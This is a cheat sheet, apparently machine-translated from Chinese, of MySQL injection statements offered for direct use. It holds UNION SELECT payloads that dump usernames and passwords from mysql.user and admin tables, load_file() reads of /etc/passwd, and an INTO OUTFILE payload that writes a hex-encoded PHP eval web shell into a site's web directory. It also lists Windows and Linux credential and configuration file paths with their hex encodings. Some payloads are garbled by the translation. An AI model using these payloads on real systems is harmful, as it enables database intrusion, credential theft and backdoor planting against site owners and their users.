Common MySQL injection statements

Mysql sqlinjection Code

#%23--*/*/**/notes

union+select+ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84 , 85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--

And+ (Select+count (*) +from+mysql.user) >0--determine if MySQL table can be read

Concat_ws (CHAR (32,58,32), User (), database (), version ()) Username MySQL version

Union+select+1,2,3,concat_ws (CHAR (32,58,32), User (), database (), version ()), 5,6,7,8,9,10,7--

UNION ALL Select 1,concat (user,0x3a,pass,0x3a,email) from users/* gets the user name password for the Users table email message

Unhex (Hex (@ @version)) Unhex mode view version

UNION ALL Select 1,unhex (Hex (@ @version)), 3/*

Convert (@ @version using latin1) Latin mode view version

Union+all+select+1,convert (@ @version using latin1), 3--

CONVERT (User () USING UTF8)
Union+all+select+1,convert (User () USING UTF8), 3--Latin method View username

and+1=2+union+select+1,passw,3+from+admin+from+mysql.user--getting MySQL account information

Union+all+select+1,concat (User,0x3a,password), 3+from+mysql.user--get MySQL account information

Union+select+1,concat_ws (0x3a,username,password), 3+from+admin--read ADMIN table username password data 0x3a to ":" Colon

Union+all+select+1,concat (Username,0x3a,password), 3+from+admin--

Union+all+select+1,concat (Username,char, password), 3+from admin--

Union+select+1,2,3,4,load_file (0x2f6574632f706173737764), 6--read the file through the Load_file () function

Union+select+1,2,3,4,replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20), 6--full display of data through the Replace function

Union+select+1,2,3,char (0x3c3f706870206576616c28245f504f53545b39305d3f3b3e), 5,6,7,8,9,10,7+into+outfile+ ' D:\ web\90team.php '--write a sentence on the web directory Trojan

<?php+eval ($_post[90]?; > A sentence prototype for the above 16 encoding

Union+select+1,2,3,load_file (d:\web\logo123.jpg), 5,6,7,8,9,10,7+into+outfile+ ' d:\web\90team.php '-- Convert PHP horse to image type upload website and write to web directory via into outfile

Common query functions

1:system_user () system user name
2:user () User name
3:current_user Current user Name
4:session_user () User name of the connection database
5:database () database name
6:version () MySQL database version @ @version
7:load_file () mysql read local file function
8:@ @datadir Read Database path
9:@ @basedir MYSQL Installation path
10:@ @version_compile_os Operating System

Under Windows:
C:/boot.ini//View system version 0x633a2f626f6f742e696e690d0a

C:/windows/php.ini//php configuration Information 0x633a2f77696e646f77732f7068702e696e69

C:/windows/my.ini//mysql configuration file, log the administrator login MySQL username and password 0x633a2f77696e646f77732f6d792e696e69

C:/winnt/php.ini 0x633a2f77696e6e742f7068702e696e69

C:/winnt/my.ini 0x633a2f77696e6e742f6d792e696e69

C:\mysql\data\mysql\user. MYD//stores the database connection password in the Mysql.user table 0x633a5c6d7973716c5c646174615c6d7973716c5c757365722e4d5944

C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini//Store Virtual host Web site path and password

0x633a5c50726f6772616d2046696c65735c5268696e6f536f66742e636f6d5c536572762d555c53657276554461656d6f6e2e696e69

C:\Program Files\serv-u\servudaemon.ini 0x633a5c50726f6772616d2046696c65735c536572762d555c53657276554461656d6f6e2e696e69

C:\windows\system32\inetsrv\MetaBase.xml//iis configuration file

C:\windows\repair\sam//Store password for initial installation of Windows system

C:\Program files\ serv-u\servuadmin.exe//6.0 version Previous serv-u Administrator password is stored in this

C:\Program Files\rhinosoft.com\servudaemon.exe

C:\Documents and Settings\All Users\Application Data\symantec\pcanywhere\*.cif File

Stored the login password for pcanywhere

C:\Program files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf//View Windows system Apache file
0x633a5c50726f6772616d2046696c65735c4170616368652047726f75705c4170616368655c636f6e66205c68747470642e636f6e66

c:/resin-3.0.14/conf/resin.conf//view JSP developed Web site Resin file configuration information. 0x633a2f526573696e2d332e302e31342f636f6e662f726573696e2e636f6e66

C:/resin/conf/resin.conf 0x633a2f526573696e2f636f6e662f726573696e2e636f6e66

/usr/local/resin/conf/resin.conf viewing a JSP virtual host for Linux system configuration 0x2f7573722f6c6f63616c2f726573696e2f636f6e662f726573696e2e636f6e66

D:\APACHE\Apache2\conf\httpd.conf 0x643a5c4150414348455c417061636865325c636f6e665c68747470642e636f6e66

C:\Program Files\mysql\my.ini 0x433a5c50726f6772616d2046696c65735c6d7973716c5c6d792e696e69

C:\windows\system32\inetsrv\MetaBase.xml Viewing the virtual host configuration for IIS 0x633a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c

C:\mysql\data\mysql\user. MYD A user password exists in the MySQL system 0x433a5c6d7973716c5c646174615c6d7973716c5c757365722e4d5944

Lunix/unix under:

/etc/passwd 0x2f6574632f706173737764

/usr/local/app/apache2/conf/httpd.conf//apache2 Default configuration file 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f68747470642e636f6e66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//virtual Site Settings 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66

/usr/local/app/php5/lib/php.ini//php Related Settings 0x2f7573722f6c6f63616c2f6170702f706870352f6c69622f7068702e696e69

/etc/sysconfig/iptables//Get firewall rule policy from 0x2f6574632f737973636f6e6669672f69707461626c657320

/ETC/HTTPD/CONF/HTTPD.CONF//Apache configuration file 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66

/etc/rsyncd.conf//Synchronizer configuration file 0x2f6574632f7273796e63642e636f6e66

/ETC/MY.CNF configuration file for//mysql 0x2f6574632f6d792e636e66

/etc/redhat-release//System version 0x2f6574632f7265646861742d72656c65617365

/etc/issue 0x2f6574632f6973737565

/etc/issue.net 0x2f6574632f69737375652e6e6574

/usr/local/app/php5/lib/php.ini//php Related Settings 0x2f7573722f6c6f63616c2f6170702f706870352f6c69622f7068702e696e69

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf//virtual Site Settings 0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66

/etc/httpd/conf/httpd.conf or/usr/local/apche/conf/httpd.conf view Linux Apache virtual Host configuration file 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66

0x2f7573722f6c6f63616c2f61706368652f636f6e662f68747470642e636f6e66

/USR/LOCAL/RESIN-3.0.22/CONF/RESIN.CONF resin configuration file for 3.0.22 view 0x2f7573722f6c6f63616c2f726573696e2d332e302e32322f636f6e662f726573696e2e636f6e66

/usr/local/resin-pro-3.0.22/conf/resin.conf Ibid. 0x2f7573722f6c6f63616c2f726573696e2d70726f2d332e302e32322f636f6e662f726573696e2e636f6e66

/usr/local/app/apache2/conf/extra/httpd-vhosts.conf Apashe Virtual Host view

0x2f7573722f6c6f63616c2f6170702f617061636865322f636f6e662f65787472612f68747470642d76686f7374732e636f6e66

/etc/sysconfig/iptables View Firewall Policy 0x2f6574632f737973636f6e6669672f69707461626c6573

Load_file (char (47)) lists the Freebsd,sunos system root directory

Replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)

Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (All), char (32))

The above two are a full display of code in a php file. Sometimes you do not replace some characters, such as "<" is replaced by "space" to return a Web page. You can't see the code.

Common MySQL injection statements